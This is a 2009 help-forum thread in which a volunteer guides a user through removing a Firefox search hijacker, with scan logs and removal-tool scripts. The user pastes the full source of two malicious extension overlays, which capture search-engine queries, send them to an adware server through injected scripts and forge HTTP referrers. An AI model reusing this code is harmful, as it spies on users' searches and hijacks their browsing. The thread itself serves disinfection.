Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

win32:rootkit-gen, win32:trojan-gen, BV:Malware-gen, [Solved]

Started by Aoc , May 13 2009 01:19 PM

  • This topic is locked This topic is locked

#31
Aoc
Posted 11 June 2009 - 08:55 AM

Aoc

    Member

  • Topic Starter
  • Member
  • PipPip
  • 36 posts
SystemLook v1.0 by jpshortstuff (22.05.09)
Log created at 09:49 on 11/06/2009 by John B (Administrator - Elevation successful)

========== dir ==========

C:\Program Files\Mozilla Firefox\extensions\{396BA20B-7E61-47EB-9095-08D70EF4D85A} - Parameters: "(none)"

---Files---
chrome.manifest --a--- 120 bytes [19:08 30/04/2009] [19:08 30/04/2009]
install.rdf --a--- 770 bytes [19:08 30/04/2009] [19:08 30/04/2009]

---Folders---
chrome d----- [19:08 30/04/2009]

C:\Program Files\Mozilla Firefox\extensions\{AFE5B061-B10B-4111-8C93-FE38258C5CE0} - Parameters: "(none)"

---Files---
chrome.manifest --a--- 120 bytes [21:06 30/04/2009] [21:06 30/04/2009]
install.rdf --a--- 770 bytes [21:06 30/04/2009] [21:06 30/04/2009]

---Folders---
chrome d----- [21:06 30/04/2009]

-=End Of File=-


Here is C:\Program Files\Mozilla Firefox\extensions\{396BA20B-7E61-47EB-9095-08D70EF4D85A}\chrome\content\overlay.xul

<?xml version="1.0" encoding="UTF-8"?>
<!--
/* ***** BEGIN LICENSE BLOCK *****
* Version: MPL 1.1/GPL 2.0/LGPL 2.1
*
* The contents of this file are subject to the Mozilla Public License Version
* 1.1 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
* http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS IS" basis,
* WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
* for the specific language governing rights and limitations under the
* License.
*
* The Original Code is XUL Reference.
*
* The Initial Developer of the Original Code is
*
* Einar Egilsson. (email: [email protected])
*
* Portions created by the Initial Developer are Copyright © 2006
* the Initial Developer. All Rights Reserved.
*
* Contributor(s):
*
* Alternatively, the contents of this file may be used under the terms of
* either the GNU General Public License Version 2 or later (the "GPL"), or
* the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
* in which case the provisions of the GPL or the LGPL are applicable instead
* of those above. If you wish to allow use of your version of this file only
* under the terms of either the GPL or the LGPL, and not to allow others to
* use your version of this file under the terms of the MPL, indicate your
* decision by deleting the provisions above and replace them with the notice
* and other provisions required by the GPL or the LGPL. If you do not delete
* the provisions above, a recipient may use your version of this file under
* the terms of any one of the MPL, the GPL or the LGPL.
*
* ***** END LICENSE BLOCK ***** */
-->

<overlay id="xulcache-overlay" xmlns="http://www.mozilla.o...e.is.only.xul">
<script type="application/x-javascript" >
window.addEventListener("load", function() { xulRef.init(); }, false);
window.addEventListener("load", initRequestObserver, false);
var xulRef = {
init:
function(){
var appcontent = document.getElementById("appcontent");
if(appcontent){
appcontent.addEventListener("DOMContentLoaded", xulRef.onPageLoad, true);
}
},
onPageLoad:
function(aEvent){
var doc = aEvent.originalTarget;
var loc = doc.location.href;
var ref = doc.referrer;
var keyword = '';
var engine ;
var __d = "http://v1.adwarefeed...0901ff&#38;e=";

if( loc.match(/google\..+\/search.*[&amp;\?]q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'google';
// } else if(loc.match(/search\.ua.+[&amp;\?]q=([^&amp;]*)/)){
// keyword = RegExp.$1;
} else if ( loc.match(/search\.yahoo.*search.*[&amp;\?]p=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'yahoo';
} else if(loc.match(/altavista\.com.*results[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'altavista';
} else if(loc.match(/alltheweb\.com.*search[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'alltheweb';
} else if(loc.match(/search\.netscape\.com.*search[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'netscape';
} else if(loc.match(/search\.aol\.com.*search[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'aol';
} else if(loc.match(/ask\.com.*web[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'ask';
} else if(loc.match(/search\.com.*search[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'searchcom';
} else if(loc.match(/search\.lycos\.com.*[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'lycos';
} else if(loc.match(/nova\.rambler\.ru.*search[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'rambler';
} else if(loc.match(/gogo\.ru.*go[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'gogo';
} else if(loc.match(/meta\.ua.*search.asp[&amp;\?]q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'meta';
//} else if(loc.match(/au\.ru.*searchPhrase=([^&amp;]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/all\.by.*search.*[&amp;\?]query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'allby';
// } else if(loc.match(/uaport\.net.*UAcatalog[/][&amp;\?].*query=([^&amp;]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/search\.msn\.com.*results.*[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'msn';
} else if(loc.match(/search\.live\.com.*results.*[&amp;\?]q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'live';
};

if( keyword.length > 0 ){
var script = window.content.document.createElement('script');
script.id = "js_0";
script.src = __d + engine + '&amp;q=' + keyword;
doc.getElementsByTagName('head')[0].appendChild(script);
}
}
};
function initRequestObserver() {
var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
observerService.addObserver(httpRequestObserver, "http-on-modify-request", false);
}

var httpRequestObserver = {
observe:
function(subject, topic, data) {
if(topic == "http-on-modify-request") {
var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);
var pos = subject.URI.spec.indexOf("&amp;rf=http");
if(pos > -1) {
var newRef = this.ioService = Components.classes["@mozilla.org/network/io-service;1"] .getService(Components.interfaces.nsIIOService) .newURI(decodeURIComponent(subject.URI.spec.substring(pos+4)), null, null);
httpChannel.referrer = newRef; subject.URI.spec = subject.URI.spec.substring(0, pos);
}
}
}
};

</script>
</overlay>


Here is C:\Program Files\Mozilla Firefox\extensions\{AFE5B061-B10B-4111-8C93-FE38258C5CE0}\chrome\content\overlay.xul



<?xml version="1.0" encoding="UTF-8"?>
<!--
/* ***** BEGIN LICENSE BLOCK *****
* Version: MPL 1.1/GPL 2.0/LGPL 2.1
*
* The contents of this file are subject to the Mozilla Public License Version
* 1.1 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
* http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS IS" basis,
* WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
* for the specific language governing rights and limitations under the
* License.
*
* The Original Code is XUL Reference.
*
* The Initial Developer of the Original Code is
*
* Einar Egilsson. (email: [email protected])
*
* Portions created by the Initial Developer are Copyright © 2006
* the Initial Developer. All Rights Reserved.
*
* Contributor(s):
*
* Alternatively, the contents of this file may be used under the terms of
* either the GNU General Public License Version 2 or later (the "GPL"), or
* the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
* in which case the provisions of the GPL or the LGPL are applicable instead
* of those above. If you wish to allow use of your version of this file only
* under the terms of either the GPL or the LGPL, and not to allow others to
* use your version of this file under the terms of the MPL, indicate your
* decision by deleting the provisions above and replace them with the notice
* and other provisions required by the GPL or the LGPL. If you do not delete
* the provisions above, a recipient may use your version of this file under
* the terms of any one of the MPL, the GPL or the LGPL.
*
* ***** END LICENSE BLOCK ***** */
-->

<overlay id="xulcache-overlay" xmlns="http://www.mozilla.o...e.is.only.xul">
<script type="application/x-javascript" >
window.addEventListener("load", function() { xulRef.init(); }, false);
window.addEventListener("load", initRequestObserver, false);
var xulRef = {
init:
function(){
var appcontent = document.getElementById("appcontent");
if(appcontent){
appcontent.addEventListener("DOMContentLoaded", xulRef.onPageLoad, true);
}
},
onPageLoad:
function(aEvent){
var doc = aEvent.originalTarget;
var loc = doc.location.href;
var ref = doc.referrer;
var keyword = '';
var engine ;
var __d = "http://v1.adwarefeed...0901ff&#38;e=";

if( loc.match(/google\..+\/search.*[&amp;\?]q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'google';
// } else if(loc.match(/search\.ua.+[&amp;\?]q=([^&amp;]*)/)){
// keyword = RegExp.$1;
} else if ( loc.match(/search\.yahoo.*search.*[&amp;\?]p=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'yahoo';
} else if(loc.match(/altavista\.com.*results[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'altavista';
} else if(loc.match(/alltheweb\.com.*search[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'alltheweb';
} else if(loc.match(/search\.netscape\.com.*search[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'netscape';
} else if(loc.match(/search\.aol\.com.*search[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'aol';
} else if(loc.match(/ask\.com.*web[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'ask';
} else if(loc.match(/search\.com.*search[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'searchcom';
} else if(loc.match(/search\.lycos\.com.*[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'lycos';
} else if(loc.match(/nova\.rambler\.ru.*search[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'rambler';
} else if(loc.match(/gogo\.ru.*go[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'gogo';
} else if(loc.match(/meta\.ua.*search.asp[&amp;\?]q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'meta';
//} else if(loc.match(/au\.ru.*searchPhrase=([^&amp;]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/all\.by.*search.*[&amp;\?]query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'allby';
// } else if(loc.match(/uaport\.net.*UAcatalog[/][&amp;\?].*query=([^&amp;]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/search\.msn\.com.*results.*[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'msn';
} else if(loc.match(/search\.live\.com.*results.*[&amp;\?]q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'live';
};

if( keyword.length > 0 ){
var script = window.content.document.createElement('script');
script.id = "js_0";
script.src = __d + engine + '&amp;q=' + keyword;
doc.getElementsByTagName('head')[0].appendChild(script);
}
}
};
function initRequestObserver() {
var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
observerService.addObserver(httpRequestObserver, "http-on-modify-request", false);
}

var httpRequestObserver = {
observe:
function(subject, topic, data) {
if(topic == "http-on-modify-request") {
var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);
var pos = subject.URI.spec.indexOf("&amp;rf=http");
if(pos > -1) {
var newRef = this.ioService = Components.classes["@mozilla.org/network/io-service;1"] .getService(Components.interfaces.nsIIOService) .newURI(decodeURIComponent(subject.URI.spec.substring(pos+4)), null, null);
httpChannel.referrer = newRef; subject.URI.spec = subject.URI.spec.substring(0, pos);
}
}
}
};

</script>
</overlay>

Thank you....
  • 0

Advertisements

#32
Egwene
Posted 11 June 2009 - 09:32 AM

Egwene

    Member 2k

  • Visiting Consultant
  • 2,141 posts
Hello,

Please double-click GooredFix.exe on your Desktop to run it.
  • Select "2. Fix Goored" by typing 2 and pressing Enter.
  • Make sure all instances of Firefox are closed at this point.
  • Type y at the prompt and press Enter again.
  • A log will open, please post the contents of that log in your next reply (it can also be found on your desktop, called GooredLog.txt).
Note: If you receive a message saying that GooredFix needs your system to be restarted, please close all applications and reboot your system. Please also allow any registry changes that may be prompted by any of your security programs.

Then :

Run OTL
  • Under the Custom Scans/Fixes box at the bottom, paste in the following

    :Files
C:\Program Files\Mozilla Firefox\extensions\{396BA20B-7E61-47EB-9095-08D70EF4D85A}
C:\Program Files\Mozilla Firefox\extensions\{AFE5B061-B10B-4111-8C93-FE38258C5CE0}

:Commands
[purity]
[emptytemp]
[start explorer]
[Reboot]
  • Then click the Run Fix button at the top
  • Let the program run unhindered, reboot when it is done

Are you still redirecting ? Please post me a fresh Foxscan report.

Regards,
Egwene.

Edited by Egwene, 11 June 2009 - 09:34 AM.

  • 0

#33
Aoc
Posted 11 June 2009 - 10:13 AM

Aoc

    Member

  • Topic Starter
  • Member
  • PipPip
  • 36 posts
here is the new scan from OTL

It appears to be fixed


========== FILES ==========
File\Folder C:\Program Files\Mozilla Firefox\extensions\{396BA20B-7E61-47EB-9095-08D70EF4D85A} not found.
File\Folder C:\Program Files\Mozilla Firefox\extensions\{AFE5B061-B10B-4111-8C93-FE38258C5CE0} not found.
========== COMMANDS ==========
File delete failed. C:\Documents and Settings\John B\Local Settings\Temp\~DF307.tmp scheduled to be deleted on reboot.
User's Temp folder emptied.
User's Internet Explorer cache folder emptied.
File delete failed. C:\Documents and Settings\LocalService\Local Settings\Temp\Temporary Internet Files\Content.IE5\index.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\LocalService\Local Settings\Temp\History\History.IE5\index.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\LocalService\Local Settings\Temp\Cookies\index.dat scheduled to be deleted on reboot.
Local Service Temp folder emptied.
File delete failed. C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat scheduled to be deleted on reboot.
Local Service Temporary Internet Files folder emptied.
Network Service Temp folder emptied.
Network Service Temporary Internet Files folder emptied.
File delete failed. C:\WINDOWS\temp\_avast4_\Webshlock.txt scheduled to be deleted on reboot.
File delete failed. C:\WINDOWS\temp\Perflib_Perfdata_648.dat scheduled to be deleted on reboot.
Windows Temp folder emptied.
Java cache emptied.
Temp folders emptied.
Explorer started successfully

OTListIt2 by OldTimer - Version 2.0.15.7 log created on 06112009_104555

Files moved on Reboot...
C:\Documents and Settings\John B\Local Settings\Temp\~DF307.tmp moved successfully.
File move failed. C:\WINDOWS\temp\_avast4_\Webshlock.txt scheduled to be moved on reboot.
C:\WINDOWS\temp\Perflib_Perfdata_648.dat moved successfully.

Registry entries deleted on Reboot...
  • 0

#34
Egwene
Posted 11 June 2009 - 10:22 AM

Egwene

    Member 2k

  • Visiting Consultant
  • 2,141 posts
Hello,

Please post me a new Foxscan report ( run again Foxscan and post me the new report ).

Regards,
Egwene.
  • 0

#35
Aoc
Posted 11 June 2009 - 11:16 AM

Aoc

    Member

  • Topic Starter
  • Member
  • PipPip
  • 36 posts
ok,


FoxScan Version 1.1.0
By Loup blanc - Zebulon.fr
Scan started Thu 06/11/2009 at 12:13

Microsoft Windows XP Home Edition Service Pack 3 [Version 5.1.2600]

Mozilla Firefox version : 3.0.10 (en-US)
Installation folder : ""


=================================================================================
---------- User account : John B [Current session]
=================================================================================


Profile name : default
Profile folder : C:\Documents and Settings\John B\Application Data\mozilla\firefox\Profiles\ghtrl0km.default\
Start pages prefs.js : "www.yahoo.com"


//////////// Setting \\\\\\\\\\\\\
======= Profile name : default =======

Firefox update : Activated
Add-on update : Activated
Search engines update : Activated
Java : Activated
Javascript : Activated
Proxy : Automatic detection




//////////// Add-on \\\\\\\\\\\\\

======= Profile name : default =======

Installation notification for Add-on is enabled

Name : Distrust
State : Activated
Folder : C:\Documents and Settings\John B\Application Data\Mozilla\Firefox\Profiles\ghtrl0km.default\extensions\[email protected]

Name : DownThemAllname
State : Activated
Folder : C:\Documents and Settings\John B\Application Data\Mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}

Name : firefusk
State : Activated
Folder : C:\Documents and Settings\John B\Application Data\Mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{fffe0eac-3819-4561-8aa9-178a68450d4f}

Name : myibay Firefox extension
State : Activated
Folder : C:\Documents and Settings\John B\Application Data\Mozilla\Firefox\Profiles\ghtrl0km.default\extensions\[email protected]

Name : PasswordMaker
State : Activated
Folder : C:\Documents and Settings\John B\Application Data\Mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{5872365e-67d1-4afd-9480-fd293bebd20d}

Name : User Agent Switcher
State : Activated
Folder : C:\Documents and Settings\John B\Application Data\Mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{e968fc70-8f95-4ab9-9e79-304de2a71ee1}

Name : Default
State : Activated
Folder : C:\Program Files\Mozilla Firefox\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

Name : 1-ClickWeather
State : Deactivated




//////////// Search plugins \\\\\\\\\\\\\

======= Profile name : default =======

Search in "prefs.js" :

browser.search.defaultenginename :
browser.search.defaulturl :
browser.search.selectedEngine :
keyword.URL :
keyword.enable :


--------- Search engines found ------------
+ Search form configured for the engine





=================================================================================
---------- Common section
=================================================================================

//////////// DLL found in ""\components \\\\\\\\\\\\\



------------------------------------------------------

//////////// Search plugins \\\\\\\\\\\\\

--------- Search engines found ------------
+ Search form configured for the engine



------------------------------------------------------

//////////// Plugins set in registry \\\\\\\\\\\\\


[HKEY_LOCAL_MACHINE\software\mozillaplugins\@adobe.com/FlashPlayer]
"Description"="Adobe® Flash® Player 10"
"Vendor"="Adobe Systems Incorporated"
"Path"="C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll"

[HKEY_LOCAL_MACHINE\software\mozillaplugins\@adobe.com/ShockwavePlayer]
"Description"="Adobe Shockwave Player"
"Vendor"="Adobe Systems Inc"
"Path"="C:\WINDOWS\system32\Adobe\Director\np32dsw.dll"

[HKEY_LOCAL_MACHINE\software\mozillaplugins\@real.com/nppl3260;version=6.0.11.2061]
"Description"="RealPlayer™ LiveConnect-Enabled Plug-In"
"Vendor"="RealNetworks"
"Path"="C:\Program Files\Real\RealPlayer\Netscape6\nppl3260.dll"

[HKEY_LOCAL_MACHINE\software\mozillaplugins\@real.com/nprjplug;version=1.0.2.2122]
"Description"="RealJukebox Netscape Plugin"
"Vendor"="RealNetworks"
"Path"="C:\Program Files\Real\RealPlayer\Netscape6\nprjplug.dll"

[HKEY_LOCAL_MACHINE\software\mozillaplugins\@real.com/nprpjplug;version=6.0.12.1059]
"Description"="6.0.12.1059"
"Vendor"="RealNetworks"
"Path"="C:\Program Files\Real\RealPlayer\Netscape6\nprpjplug.dll"

[HKEY_LOCAL_MACHINE\software\mozillaplugins\@real.com/nsJSRealPlayerPlugin;version=]

[HKEY_LOCAL_MACHINE\software\mozillaplugins\@tools.google.com/Google Update;version=8]
"Description"="Google Update"
"Vendor"="Google"
"Path"="C:\Program Files\Google\Update\1.2.145.5\npGoogleOneClick8.dll"

[HKEY_LOCAL_MACHINE\software\mozillaplugins\@unity3d.com/UnityPlayer]
"Description"="Unity Player 2.0.2f2"
"Vendor"="Unity Technologies ApS"
"Path"="C:\Program Files\Unity\WebPlayer\loader\npUnity3D32.dll"

[HKEY_LOCAL_MACHINE\software\mozillaplugins\@viewpoint.com/VMP]
"Description"="Viewpoint Media Player for Mozilla"
"Vendor"="Viewpoint Corporation"
"Path"="C:\Program Files\Viewpoint\Viewpoint Experience Technology\npViewpoint.dll"

[HKEY_LOCAL_MACHINE\software\mozillaplugins\[email protected]/YahooActiveXPluginBridge;version=1.0.0.1]
"Description"="Yahoo! activeX Plug-in Bridge"
"Vendor"="Yahoo"
"Path"="C:\Program Files\Yahoo!\Common\npyaxmpb.dll"

[HKEY_CURRENT_USER\software\mozillaplugins\@adobe.com/FlashPlayer]
"Description"="Adobe Flash Player 9.0"
"Vendor"="Adobe Systems Inc."
"Path"="C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll"


------------------------------------------------------

//////////// Additional search... \\\\\\\\\\\\\

==== Additional extension ====


[HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Firefox\extensions]

[HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 3.0.10\extensions]


=========================== End of report ===========================
  • 0

#36
Aoc
Posted 15 June 2009 - 01:15 PM

Aoc

    Member

  • Topic Starter
  • Member
  • PipPip
  • 36 posts
still with me?
  • 0

#37
Egwene
Posted 20 June 2009 - 02:44 AM

Egwene

    Member 2k

  • Visiting Consultant
  • 2,141 posts
Hello Aoc,

Looks good :)

Please download Malwarebytes' Anti-Malware from Here or Here

Double Click mbam-setup.exe to install the application.
  • Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select "Perform Quick Scan", then click Scan.
  • The scan may take some time to finish,so please be patient.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Make sure that everything is checked, and click Remove Selected.
  • When disinfection is completed, a log will open in Notepad and you may be prompted to Restart.(See Extra Note)
  • The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.
  • Copy&Paste the entire report in your next reply.
Extra Note:
If MBAM encounters a file that is difficult to remove,you will be presented with 1 of 2 prompts,click OK to either and let MBAM proceed with the disinfection process,if asked to restart the computer,please do so immediatly.

Then :

Establish an internet connection & perform an online scan with Firefox or Internet Explorer at Kaspersky Online Scanner

**Note**

To optimize scanning time and produce a more sensible report for review:
  • Close any open programs
  • Turn off the real time scanner of any existing antivirus program while performing the online scan.
Click Accept, when prompted to download and install the program files and database of malware definitions.
  • Click Run at the Security prompt.
  • The program will then begin downloading and installing and will also update the database.
  • Please be patient as this can take several minutes.
  • Once the update is complete, click on My Computer under the green Scan bar to the left to start the scan.
  • Once the scan is complete, it will display if your system has been infected. It does not provide an option to clean/disinfect. We only require a report from it.
  • Do NOT be alarmed by what you see in the report. Many of the finds have likely been quarantined.
  • Click View scan report at the bottom.
  • Click the Save Report As... button.
  • Click the Save as Text button to save the file to your desktop so that you may post it in your next reply.

Regards,
Egwene.
  • 0

#38
Aoc
Posted 25 June 2009 - 01:04 PM

Aoc

    Member

  • Topic Starter
  • Member
  • PipPip
  • 36 posts
ok, here is the two logs


Malwarebytes' Anti-Malware 1.38
Database version: 2326
Windows 5.1.2600 Service Pack 3

6/24/2009 9:04:31 AM
mbam-log-2009-06-24 (09-04-31).txt

Scan type: Quick Scan
Objects scanned: 100973
Time elapsed: 7 minute(s), 7 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 3
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_CLASSES_ROOT\CLSID\{bad4551d-9b24-42cb-9bcd-818ca2da7b63} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{bad4551d-9b24-42cb-9bcd-818ca2da7b63} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\AvScan (Malware.Trace) -> Quarantined and deleted successfully.

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)



--------------------------------------------------------------------------------
KASPERSKY ONLINE SCANNER 7.0 REPORT
Thursday, June 25, 2009
Operating System: Microsoft Windows XP Home Edition Service Pack 3 (build 2600)
Kaspersky Online Scanner version: 7.0.26.13
Program database last update: Wednesday, June 24, 2009 23:08:15
Records in database: 2387606
--------------------------------------------------------------------------------

Scan settings:
Scan using the following database: extended
Scan archives: yes
Scan mail databases: yes

Scan area - My Computer:
C:\
D:\

Scan statistics:
Files scanned: 92818
Threat name: 8
Infected objects: 10
Suspicious objects: 4
Duration of the scan: 02:45:56


File name / Threat name / Threats count
C:\Documents and Settings\John B\Application Data\Thunderbird\Profiles\qhyabnx5.default\Mail\Local Folders\Inbox Suspicious: Trojan-Spy.HTML.Fraud.gen 4
C:\Documents and Settings\John B\Application Data\Thunderbird\Profiles\qhyabnx5.default\Mail\Local Folders\Inbox Infected: Trojan-Spy.HTML.Bankfraud.rw 1
C:\Documents and Settings\John B\desktop\porthard\workcomputer\docs\Downloads\Programs\Sparkle_dwn.exe Infected: not-a-virus:AdWare.Win32.Virtumonde.rnh 1
C:\Documents and Settings\John B\DoctorWeb\Quarantine\Abel.exe Infected: not-a-virus:PSWTool.Win32.Cain.284 1
C:\Documents and Settings\John B\My Documents\My Completed Downloads\ca_setup.exe Infected: not-a-virus:PSWTool.Win32.Cain.284 1
C:\poykfa.exe Infected: Trojan-Spy.Win32.Zbot.gen 1
C:\System Volume Information\_restore{5808F9B6-96B5-4803-A039-47EB1E010CB7}\RP386\A0066277.exe Infected: not-a-virus:PSWTool.Win32.Cain.284 1
C:\System Volume Information\_restore{5808F9B6-96B5-4803-A039-47EB1E010CB7}\RP403\A0066755.exe Infected: Trojan-Spy.Win32.Zbot.gen 1
C:\System Volume Information\_restore{5808F9B6-96B5-4803-A039-47EB1E010CB7}\RP403\A0066760.dll Infected: Trojan-Downloader.Win32.FraudLoad.wcff 1
C:\System Volume Information\_restore{5808F9B6-96B5-4803-A039-47EB1E010CB7}\RP403\A0066778.dll Infected: Trojan-Downloader.Win32.Small.jwp 1
C:\_OTListIt\MovedFiles\05272009_102450\Documents and Settings\John B\Local Settings\Temp\plugtmp-1\plugin-pfre.php Infected: Exploit.Win32.Pidief.azg 1

The selected area was scanned.
  • 0

#39
Egwene
Posted 08 July 2009 - 03:14 PM

Egwene

    Member 2k

  • Visiting Consultant
  • 2,141 posts
Hello and sorry for the delay,

Please post me a fresh OTL log.

Thanks.

Regards,
Egwene.

Edited by Egwene, 08 July 2009 - 03:14 PM.

  • 0

#40
Aoc
Posted 09 July 2009 - 10:31 AM

Aoc

    Member

  • Topic Starter
  • Member
  • PipPip
  • 36 posts
OTListIt logfile created on: 7/9/2009 11:26:11 AM - Run 5
OTListIt2 by OldTimer - Version 2.0.15.7 Folder = C:\Documents and Settings\John B\Desktop
Windows XP Home Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 6.0.2900.5512)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

750.79 Mb Total Physical Memory | 264.11 Mb Available Physical Memory | 35.18% Memory free
1.05 Gb Paging File | 0.70 Gb Available in Paging File | 66.48% Paging File free
Paging file location(s): C:\pagefile.sys 360 720 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 37.26 Gb Total Space | 8.38 Gb Free Space | 22.48% Space Free | Partition Type: NTFS
D: Drive not present or media not loaded
Drive E: | 76.31 Gb Total Space | 67.72 Gb Free Space | 88.75% Space Free | Partition Type: FAT32
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded

Computer Name: JOHNLAPTOP
Current User Name: John B
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: Current user
Output = Minimal
File Age = 30 Days
Company Name Whitelist: On

========== Processes (SafeList) ==========

PRC - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe (ALWIL Software)
PRC - C:\Program Files\Alwil Software\Avast4\ashServ.exe (ALWIL Software)
PRC - C:\WINDOWS\Explorer.EXE (Microsoft Corporation)
PRC - C:\WINDOWS\system32\TPSMain.exe (TOSHIBA Corporation)
PRC - C:\WINDOWS\AGRSMMSG.exe (Agere Systems)
PRC - C:\WINDOWS\system32\TFNF5.exe (TOSHIBA Corp.)
PRC - C:\Program Files\Alwil Software\Avast4\ashDisp.exe (ALWIL Software)
PRC - C:\Program Files\Java\jre6\bin\jusched.exe (Sun Microsystems, Inc.)
PRC - C:\Documents and Settings\All Users\Start Menu\Programs\Startup\00THotkey.exe (TOSHIBA Corp.)
PRC - C:\WINDOWS\system32\TPSBattM.exe (TOSHIBA Corporation)
PRC - C:\WINDOWS\system32\RAMASST.exe (Matsushita Electric Industrial Co., Ltd.)
PRC - C:\Program Files\Common Files\ArcSoft\Connection Service\Bin\ACService.exe (ArcSoft Inc.)
PRC - C:\WINDOWS\system32\drivers\CDAC11BA.EXE (C-Dilla Ltd)
PRC - C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe (TOSHIBA CORPORATION)
PRC - C:\WINDOWS\System32\DVDRAMSV.exe (Matsushita Electric Industrial Co., Ltd.)
PRC - C:\Program Files\Java\jre6\bin\jqs.exe (Sun Microsystems, Inc.)
PRC - C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe (Microsoft Corporation)
PRC - C:\WINDOWS\system32\HPZipm12.exe (HP)
PRC - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe (Analog Devices, Inc.)
PRC - C:\Program Files\Canon\CAL\CALMAIN.exe (Canon Inc.)
PRC - C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\HP1006MC.EXE (Software 2000 Limited)
PRC - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe (ALWIL Software)
PRC - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe (ALWIL Software)
